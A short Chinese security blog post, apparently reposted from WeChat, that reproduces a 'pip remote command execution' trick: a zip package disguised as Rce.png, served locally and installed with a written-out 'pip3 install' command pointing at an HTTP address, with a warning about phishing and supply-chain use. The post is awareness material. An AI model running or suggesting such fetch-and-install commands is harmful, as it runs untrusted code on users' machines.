昨天出了一个新的“洞”,pip远程命令执行，我们回顾一下，顺便谨防钓鱼攻击

其实说实话，这个洞是有争议的，不过竟然有效果，那咱们就复现一波。

首先脚本地址是在github的

https://github.com/52piaoyu/linux-pip-rce

下载之后是主机文件其实是Rce.png，而后将格式更改成zip文件，可以看到其实文件的主题就是如下的

很简单很明了，干干净净~

好了，步入正题。

我们本地复现，本地利用python3环境开始临时的http环境

python -m http.server

而后靶机环境是kali哈

pip3 install "http://192"."168"."xx"."xxx:8000/Rce.png"

就这样，就可以了，点到即止

怎么说呢，可以，但是没必要，因为这个洞只能本地利用，其次就是用于供应链、社工钓鱼还行，但是我想这个Poc...应该也许可能没人点吧。。。

凑个字数

免责声明

• 网站发布的靶场项目中涉及的任何脚本，仅用于测试和学习研究，禁止用于商业用途，不能保证其合法性，准确性，完整性和有效性，请根据情况自行判断。

• 本文内我不懂安全所有资源文件，禁止任何公众号、自媒体进行任何形式的转载、发布。

• 我不懂安全对任何思路、脚本及工具问题概不负责，包括但不限于由任何脚本错误导致的任何损失或损害.

• 文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用，任何人不得将其应用于非法用途及盈利等目的，间接使用文章中的任何工具、思路及技术，包括但不限于建立VPS或在某些行为违反国家/地区法律或相关法规的情况下进行传播, 我不懂安全对于由此引起的任何隐私泄漏或其他任何法律后果概不负责。

• 如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利，则应及时通知并提供身份证明，所有权证明，我们将在收到认证文件后删除相关内容。

• 以任何方式查看或使用此项目的人或直接或间接使用项目的任何脚本的使用者都应仔细阅读此声明。我不懂安全保留随时更改或补充此免责声明的权利。一旦使用访问 我不懂安全项目，则视为您已接受此免责声明。

您访问或者使用了 我不懂安全，则视为已接受此声明，请仔细阅读

您在本声明未发出之时使用或者访问了 我不懂安全，则视为已接受此声明，请仔细阅读

原文始发于微信公众号（我不懂安全）：警惕诡异的pip install命令（linux系统）